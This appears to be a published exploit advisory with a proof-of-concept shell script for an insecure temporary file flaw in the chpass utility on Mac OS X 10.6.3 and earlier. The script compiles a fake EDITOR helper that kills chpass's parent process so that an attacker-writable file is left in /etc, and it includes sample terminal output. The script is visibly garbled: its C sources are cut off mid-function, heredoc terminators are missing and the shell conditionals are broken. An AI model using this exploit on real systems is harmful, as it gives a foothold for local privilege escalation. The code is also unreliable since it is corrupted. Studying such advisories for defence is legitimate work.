Apple Mac OS X versions 10.6.3 and below suffer from a chpass BSD insecure temp file creation in /etc vulnerability. A user can create a file with rw perms in /etc as owner and populate it with arbitrary data. This could be utilized to fill the disk or write configuration file information that could be combined with another flaw to elevate local privileges.
# Apple <= 10.6.3 'chpass' BSD insecure temp file creation in /etc vuln
# =====================================================================
# A user can create a file with rw perms in /etc as owner and populate
# it with arbitrary data. This could be utilized to fill the disk or
# write configuration file information that could be combined with
# another flaw to elevate local privileges. This shell script takes
# an arguement which is the filename to create (appended with .XXXXXX)
# or I.HAX by default.
# e.g
# fantastics-macbook:~ fantastic$ id
# uid=501(fantastic) gid=20(staff) groups=20(staff)
# fantastics-macbook:~ fantastic$ ls -l /etc
# lrwxr-xr-x@ 1 root wheel 11 10 Feb 18:42 /etc -> private/etc
# fantastics-macbook:~ fantastic$ ./
# [ Apple <= 10.6.3 'chpass' arbitrary /etc file creation exploit
# Password for fantastic:
# [ Created evil file /etc/I.HAX.9GrrKm
# [ Killing my parent PID 1472
# ./ line 47: 1472 Killed ./exploit I.HAX
# fantastics-macbook:~ fantastic$ ls -al /etc/I.HAX.9GrrKm
# -rw------- 1 fantastic staff 203 17 May 21:15 /etc/I.HAX.9GrrKm
# fantastics-macbook:~ fantastic$ echo "Turtle power" > /etc/I.HAX.9GrrKm
# fantastics-macbook:~ fantastic$ cat /etc/I.HAX.9GrrKm
# Turtle power
# -- prdelka
cat >> evil.c << EOF
#include <sys/types.h>
#include <unistd.h>
#include <signal.h>
int main(int argc,char* argv[]){
printf("[ Created evil file %s\n",argv[1]);
pid_t parent = getppid();
printf("[ Killing my parent PID %d\n",parent);
gcc evil.c -o evil 2>/dev/null
rm -rf evil.c
cat >> exploit.c << EOF
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc,char* argv[]){
char* envp[]={"EDITOR=./evil",NULL};
char* args[]={argv[1],NULL};
printf("[ Apple <= 10.6.3 'chpass' arbitrary /etc file creation exploit\n");
gcc exploit.c -o exploit 2>/dev/null
rm -rf exploit.c
if [ $1 ]
./exploit $1
./exploit I.HAX
rm -rf evil exploit